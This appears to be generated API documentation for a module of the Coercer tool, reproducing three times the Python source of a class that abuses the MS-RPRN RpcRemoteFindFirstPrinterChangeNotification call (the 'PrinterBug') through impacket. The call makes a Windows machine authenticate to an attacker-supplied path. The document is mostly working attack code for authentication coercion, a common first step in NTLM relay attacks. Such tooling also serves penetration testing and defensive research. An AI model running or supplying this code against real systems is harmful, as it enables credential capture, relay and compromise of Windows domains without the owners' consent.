coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : RpcRemoteFindFirstPrinterChangeNotification.py 4# Author : Podalirius (@podalirius_) 5# Date created : 15 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from impacket.dcerpc.v5 import rprn 10from impacket.dcerpc.v5.dtypes import NULL 11 12 13class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL): 14 """ 15 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83) 16 17 Method found by: 18 - 19 """ 20 21 access = { 22 "ncan_np": [ 23 { 24 "namedpipe": r"\PIPE\spoolss", 25 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 26 "version": "1.0" 27 } 28 ] 29 } 30 31 protocol = { 32 "longname": "[MS-RPRN]: Print System Remote Protocol", 33 "shortname": "MS-RPRN" 34 } 35 36 function = { 37 "name": "RpcRemoteFindFirstPrinterChangeNotification", 38 "opnum": 62, 39 "vulnerable_arguments": ["pszLocalMachine"] 40 } 41 42 def trigger(self, dcerpc_session, target): 43 if dcerpc_session is not None: 44 try: 45 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 46 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 47 request['hPrinter'] = resp['pHandle'] 48 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 49 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 50 request['fdwOptions'] = 0x00000000 51 request['pszLocalMachine'] = self.path 52 request['dwPrinterLocal'] = 0 53 request['cbBuffer'] = NULL 54 request['pBuffer'] = NULL 55 resp = dcerpc_session.request(request) 56 return "" 57 except Exception as err: 58 return err 59 else: 60 print("[!] Error: dce is None, you must call connect() first.") 61 return None
class
RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL): 15 """ 16 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83) 17 18 Method found by: 19 - 20 """ 21 22 access = { 23 "ncan_np": [ 24 { 25 "namedpipe": r"\PIPE\spoolss", 26 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 27 "version": "1.0" 28 } 29 ] 30 } 31 32 protocol = { 33 "longname": "[MS-RPRN]: Print System Remote Protocol", 34 "shortname": "MS-RPRN" 35 } 36 37 function = { 38 "name": "RpcRemoteFindFirstPrinterChangeNotification", 39 "opnum": 62, 40 "vulnerable_arguments": ["pszLocalMachine"] 41 } 42 43 def trigger(self, dcerpc_session, target): 44 if dcerpc_session is not None: 45 try: 46 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 47 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 48 request['hPrinter'] = resp['pHandle'] 49 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 50 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 51 request['fdwOptions'] = 0x00000000 52 request['pszLocalMachine'] = self.path 53 request['dwPrinterLocal'] = 0 54 request['cbBuffer'] = NULL 55 request['pBuffer'] = NULL 56 resp = dcerpc_session.request(request) 57 return "" 58 except Exception as err: 59 return err 60 else: 61 print("[!] Error: dce is None, you must call connect() first.") 62 return None
Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
Method found by: -
def
trigger(self, dcerpc_session, target):
43 def trigger(self, dcerpc_session, target): 44 if dcerpc_session is not None: 45 try: 46 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 47 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 48 request['hPrinter'] = resp['pHandle'] 49 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 50 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 51 request['fdwOptions'] = 0x00000000 52 request['pszLocalMachine'] = self.path 53 request['dwPrinterLocal'] = 0 54 request['cbBuffer'] = NULL 55 request['pBuffer'] = NULL 56 resp = dcerpc_session.request(request) 57 return "" 58 except Exception as err: 59 return err 60 else: 61 print("[!] Error: dce is None, you must call connect() first.") 62 return None